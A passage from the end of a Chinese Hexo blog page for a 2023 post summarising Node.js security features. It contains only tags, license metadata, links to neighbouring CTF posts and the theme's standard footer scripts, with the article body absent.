  <a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/node-js/" class="category-chain-item">node.js</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/ctf/" class="print-no-link">#ctf</a>
      
        <a href="/tags/web/" class="print-no-link">#web</a>
      
        <a href="/tags/notes/" class="print-no-link">#notes</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>nodejs安全特性总结</div>
      <div>http://example.com/2023/07/20/blog0030-node.js安全特性总结/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>whistle.H</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年7月20日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/08/26/blog0032-php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%95%E8%BF%87-wakeup%E6%80%BB%E7%BB%93/" title="php反序列化绕过 wakeup 总结">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">php反序列化绕过 wakeup 总结</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/10/20/blog0027-PHP-VScode-Server-SSH%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95%E6%95%99%E7%A8%8B/" title="PHP+VSCode Server+SSH远程调试教程">
                        <span class="hidden-mobile">PHP+VSCode Server+SSH远程调试教程</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  


  
  









    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  
      <script>
        if (!window.MathJax) {
          window.MathJax = {
            tex    : {
              inlineMath: { '[+]': [['$', '$']] }
            },
            loader : {
              load: ['ui/lazy']
            },
            options: {
              renderActions: {
                insertedScript: [200, () => {
                  document.querySelectorAll('mjx-container').forEach(node => {
                    let target = node.parentNode;
                    if (target.nodeName.toLowerCase() === 'li') {
                      target.parentNode.classList.add('has-jax');
                    }
                  });
                }, '', false]
              }
            }
          };
        } else {
          MathJax.startup.document.state(0);
          MathJax.texReset();
          MathJax.typeset();
          MathJax.typesetPromise();
        }

        Fluid.events.registerRefreshCallback(function() {
          if ('MathJax' in window && MathJax.startup.document && typeof MathJax.startup.document.state === 'function') {
            MathJax.startup.document.state(0);
            MathJax.texReset();
            MathJax.typeset();
            MathJax.typesetPromise();
          }
        });
      </script>
    

  <script  src="https://lib.baomitu.com/mathjax/3.2.2/es5/tex-mml-chtml.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
